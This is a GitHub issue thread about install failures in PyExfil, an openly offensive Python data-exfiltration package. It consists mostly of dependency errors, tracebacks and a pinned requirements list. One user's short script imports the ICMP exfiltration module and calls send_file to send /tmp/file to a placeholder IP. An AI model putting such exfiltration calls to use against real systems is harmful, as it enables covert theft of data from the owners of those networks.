search

ytisf / PyExfil

A Python Package for Data Exfiltration
https://pyexfil.morirt.com
MIT License
761 stars 135 forks source link

Clean install doesn't work #20

Closed CapacitorSet closed 2 years ago

CapacitorSet commented 3 years ago

I'm trying to use PyExfil and I'm having several problems starting from a clean install (Python 3.9.1, Linux).

I'm following the instructions in the README:

git clone https://www.github.com/ytisf/PyExfil
cd PyExfil
pip install --user -r requirements.txt

except with pip install -r requirements3.txt because I'm in a venv and requirements.txt doesn't exist. I also removed the librosa (audio analysis) dependency since in turn it depended on llvm-libs.

The readme then specifies pip setup.py --user install (that should be python). I'm getting error: option --user not recognized, so I drop it. Python then says:

rocessing dependencies for PyExfil==1.3
Searching for urllib2
Reading https://pypi.org/simple/urllib2/
Couldn't find index page for 'urllib2' (maybe misspelled?)
Scanning index of all packages (this may take a while)
Reading https://pypi.org/simple/
No local packages or working download links found for urllib2
error: Could not find suitable distribution for Requirement.parse('urllib2')

It is actually a Python 2 standard library so I removed the requirement; note however that it is still used in HTTPS and QUIC.

Likewise for hashlib, although with a more cryptic error.

The installation then proceeds successfully, but I can't import anything from the package:

Traceback (most recent call last):
  File "/home/yuri/codice/bizarre-net/socket/pyexfil-bridge.py", line 3, in <module>
    from pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener
ModuleNotFoundError: No module named 'pyexfil.network'

Indeed, importing it in the REPL shows that it only exports AUTHORS, NAME and a few other variables.

I then tried installing it "manually" by copying the pyexfil directory to where I needed it. I then found out that even a simple usage doesn't work:

#!/usr/bin/python

from pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener

send_file("1.2.3.4", file_path="/tmp/file")
Traceback (most recent call last):
  File "/home/yuri/codice/bizarre-net/socket/pyexfil-bridge.py", line 5, in <module>
    send_file("1.2.3.4", file_path="/tmp/file")
  File "/home/yuri/codice/bizarre-net/socket/pyexfil/network/ICMP/icmp_exfiltration.py", line 76, in send_file
    icmp.contains(ImpactPacket.Data(current_packet))
  File "/home/yuri/codice/bizarre-net/socket/venv/lib/python3.9/site-packages/impacket/ImpactPacket.py", line 485, in __init__
    self.set_data(aBuffer)
  File "/home/yuri/codice/bizarre-net/socket/venv/lib/python3.9/site-packages/impacket/ImpactPacket.py", line 488, in set_data
    self.set_bytes_from_string(data)
  File "/home/yuri/codice/bizarre-net/socket/venv/lib/python3.9/site-packages/impacket/ImpactPacket.py", line 59, in set_bytes_from_string
    self.__bytes = array.array('B', data)
TypeError: cannot use a str to initialize an array with typecode 'B'

I believe this error is caused by my version of impacket being too recent, as there are no specific constraints in requirements.txt or setup.py. I think the author will need to freeze the packages to known-good versions.

Glenn408 commented 3 years ago

I'm having the same issue.

Has any fix been made or workaround been found?

CapacitorSet commented 3 years ago

I eventually managed to get it working, although I can't quite remember how I got there and it doesn't cover every channel (I was only interested in ICMP). This is the output of pip freeze to be put into requirements.txt:

base58==1.0.3
certifi==2020.12.5
cffi==1.14.5
chardet==4.0.0
click==7.1.2
cryptography==3.3.2
dnspython==1.16.0
enum34==1.1.10
Faker==3.0.1
Flask==1.1.2
future==0.18.2
idna==2.10
impacket==0.9.22
ipaddress==1.0.23
itsdangerous==1.1.0
Jinja2==2.11.3
ldap3==2.9
ldapdomaindump==0.9.3
luhn==0.2.0
MarkupSafe==1.1.1
names==0.3.0
numpy==1.16.6
Pillow==6.2.2
progressbar==2.5
pyasn1==0.4.8
pycparser==2.20
pycryptodome==3.10.1
pycryptodomex==3.10.1
pyOpenSSL==20.0.1
python-dateutil==2.8.1
pytube3==9.5.5
qrcode==6.1
requests==2.25.1
six==1.15.0
slackclient==1.3.2
text-unidecode==1.3
urllib3==1.26.3
websocket-client==0.54.0
Werkzeug==1.0.1
ytisf commented 3 years ago

Hey, Could you confirm the new requirements files work for you? Thanks for opening this issue up. The requirements does need a revamp.

bp32795 commented 3 years ago

I just tried it and it failed on Pillow, but I am also trying to get it to run on Windows and 3.9: 

Pillow does not yet support Python 3.9 and does not yet provide prebuilt Windows binaries. We do not r
ecommend building from source on Windows.
ytisf commented 3 years ago

Hey @bp32795 . Thanks for taking the time to check this. It seems like Pillow is just not supported on Windows with Python3.9. This package is used almost across all of the Stenography modules. You can comment it out if you're not planning on using them, but if you do it looks like you'll just have to install it on another system.

We would appreciate your feedback on either scenario (knowing that everything worked after commenting Pillow in the requirements file OR full install worked on whatever other machine you've chosen). Thanks again.

ytisf commented 2 years ago

As no additional inputs were provided i'll be closing this. Thanks to everyone. If anyone is still having trouble after pip3 install requirements.txt kindly open another issue so we can fix it.